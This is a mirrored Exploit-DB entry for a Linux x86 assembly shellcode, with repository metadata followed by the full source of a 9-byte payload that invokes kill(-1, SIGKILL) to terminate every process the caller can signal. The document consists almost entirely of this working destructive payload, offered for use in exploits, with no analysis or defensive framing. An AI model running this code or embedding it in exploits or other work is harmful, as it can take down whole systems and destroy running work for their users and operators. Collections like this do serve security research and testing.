exploit-db-mirror/shellcodes/linux_x86/13548.asm
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

14 lines
No EOL
234 B
NASM

; linux/x86 kill all processes 9 bytes
; root@thegibson
; 2010-01-14
section .text
global _start
_start:
; kill(-1, SIGKILL);
mov al, 37
push byte -1
pop ebx
mov cl, 9
int 0x80